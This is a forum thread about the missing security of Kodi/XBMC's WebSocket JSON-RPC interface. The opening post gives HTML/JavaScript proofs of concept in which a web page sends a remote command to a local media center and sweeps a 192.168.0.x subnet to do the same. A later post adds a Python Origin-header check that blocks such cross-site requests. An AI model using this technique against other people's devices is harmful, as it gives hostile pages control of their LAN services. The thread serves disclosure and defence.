Security, websockets & JSON-RPC
#1
Question 
I was a bit surprised by the lack of security features implemented in relation to Websockets and JSON-RPC; it seems almost too easy to booby-trap a website.

Example:

Code:
<html>
<script language="javascript" type="text/javascript">
  var websocket = new WebSocket('ws://127.0.0.1:9090/jsonrpc');
  websocket.onopen = function(evt) { websocket.send('{"jsonrpc": "2.0", "method": "System.EjectOpticalDrive"}') };
</script>
</html>

Or if there's a media center with remote access enabled, let's scan the network.

Code:
<html>
<script language="javascript" type="text/javascript">
var local_ips = '192.168.0.';
function tryport(i) {
  console.log('trying ' + i)
  var websocket = new WebSocket('ws://' + local_ips + i + ':9090/jsonrpc');
  websocket.onopen = function(evt) { websocket.send('{"jsonrpc": "2.0", "method": "System.EjectOpticalDrive"}') };
}

for (var i=1; i<256; i++) {
  tryport(i);
};
</script>
</html>

Tested with Windows and Frodo RC3.
#2
I expect that the answer you'll get is: XBMC is not secure and is expected to run in a local (friendly) LAN.
AWXi - Ajax web interface. Wiki
#3
(2013-01-13, 17:02)Mizaki Wrote: I expect that the answer you'll get is: XBMC is not secure and is expected to run in a local (friendly) LAN.

What he said. If you don't trust the people in your network, don't enable remote access. It's not only the websocket interface which has this lack of security, the TCP server is the same and if you don't set a password on the webserver, HTTP access is the same.
Always read the online manual (wiki), FAQ (wiki) and search the forum before posting.
Do not e-mail Team Kodi members directly asking for support. Read/follow the forum rules (wiki).
Please read the pages on troubleshooting (wiki) and bug reporting (wiki) before reporting issues.
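The cross-site trick in the first post works because a browser will open a WebSocket to any host, but it always sends the page's `Origin` in the upgrade request. A JSON-RPC server can therefore refuse upgrades that do not come from its own web interface, which is the standard mitigation for browser-driven abuse of a local service. The following Python is an added example written for this thread, not Kodi/XBMC code: the allowed origin `http://127.0.0.1:8080`, the hostile origin `http://evil.example` and the three handshake texts are constructed for illustration, and the `Sec-WebSocket-Key` / `Sec-WebSocket-Accept` pair is the one from RFC 6455.

```python
from __future__ import annotations

import base64
import hashlib

# Fixed GUID from RFC 6455 used to derive Sec-WebSocket-Accept from the client key.
WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"

# Constructed policy: only the service's own web UI may open the JSON-RPC socket.
ALLOWED_ORIGINS = frozenset({"http://127.0.0.1:8080"})


def parse_handshake(raw: str) -> dict:
    """Split a raw HTTP upgrade request into method, target and lower-cased headers."""
    lines = raw.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        if not line:  # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def accept_key(client_key: str) -> str:
    """Compute Sec-WebSocket-Accept = base64(sha1(key + GUID)) as RFC 6455 requires."""
    digest = hashlib.sha1((client_key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def check_handshake(raw: str, allowed_origins: frozenset[str],
                    require_origin: bool = True) -> dict:
    """Decide whether to complete the upgrade. Returns allowed/reason/accept_key."""
    req = parse_handshake(raw)
    h = req["headers"]
    if req["method"] != "GET":
        return {"allowed": False, "reason": "upgrade must use GET", "accept_key": None}
    if h.get("upgrade", "").lower() != "websocket":
        return {"allowed": False, "reason": "missing Upgrade: websocket", "accept_key": None}
    tokens = {t.strip().lower() for t in h.get("connection", "").split(",")}
    if "upgrade" not in tokens:
        return {"allowed": False, "reason": "missing Connection: Upgrade", "accept_key": None}
    key = h.get("sec-websocket-key")
    if not key:
        return {"allowed": False, "reason": "missing Sec-WebSocket-Key", "accept_key": None}
    origin = h.get("origin")
    if origin is None:
        # Browsers always send Origin; non-browser clients usually do not.
        if require_origin:
            return {"allowed": False, "reason": "missing Origin header", "accept_key": None}
    elif origin.lower() not in allowed_origins:
        return {"allowed": False, "reason": f"origin not allowed: {origin}", "accept_key": None}
    return {"allowed": True, "reason": "ok", "accept_key": accept_key(key)}


def _handshake(origin_line: str) -> str:
    """Build a constructed upgrade request like a browser would send to ws://127.0.0.1:9090/jsonrpc."""
    return (
        "GET /jsonrpc HTTP/1.1\r\n"
        "Host: 127.0.0.1:9090\r\n"
        "Upgrade: websocket\r\n"
        "Connection: Upgrade\r\n"
        "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n"  # RFC 6455 sample key
        "Sec-WebSocket-Version: 13\r\n"
        + origin_line +
        "\r\n"
    )


# Constructed sample handshakes: a booby-trapped page, the service's own UI, and a non-browser client.
CROSS_ORIGIN_HANDSHAKE = _handshake("Origin: http://evil.example\r\n")
SAME_ORIGIN_HANDSHAKE = _handshake("Origin: http://127.0.0.1:8080\r\n")
NO_ORIGIN_HANDSHAKE = _handshake("")

if __name__ == "__main__":
    for label, raw in [("cross-origin page", CROSS_ORIGIN_HANDSHAKE),
                       ("own web UI", SAME_ORIGIN_HANDSHAKE),
                       ("non-browser client", NO_ORIGIN_HANDSHAKE)]:
        print(label, "->", check_handshake(raw, ALLOWED_ORIGINS))
```

The check only stops requests driven through a victim's browser: a client that is already on the LAN can omit or forge `Origin`, which is why `require_origin=False` is a policy choice for remote-control apps and why, as the reply above says, the real control remains not exposing the interface to untrusted networks. The same reasoning applies to the plain TCP server and to an HTTP webserver left without a password.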
#4
Implementing robust security measures is crucial when integrating websockets and JSON-RPC. Employing encryption protocols, secure authentication mechanisms, and regularly updating software can fortify the system against potential vulnerabilities. Prioritizing security ensures the reliability and confidentiality of communication, fostering a resilient websockets and JSON-RPC environment.
#5
This has to be close to a new record, responding to an 11+ year old post.


Jeff
Running with the Mezzmo Kodi addon.  The easier way to share your media with multiple Kodi clients.
Service.autostop , CBC Sports, Kodi Selective Cleaner and Mezzmo Kodi addon author.
#6
Even if it reads a bit "AI-ish".
#7
(2024-03-10, 15:34)selfcontained Wrote: Even if it reads a bit "AI-ish".

Indeed.  My thought exactly.
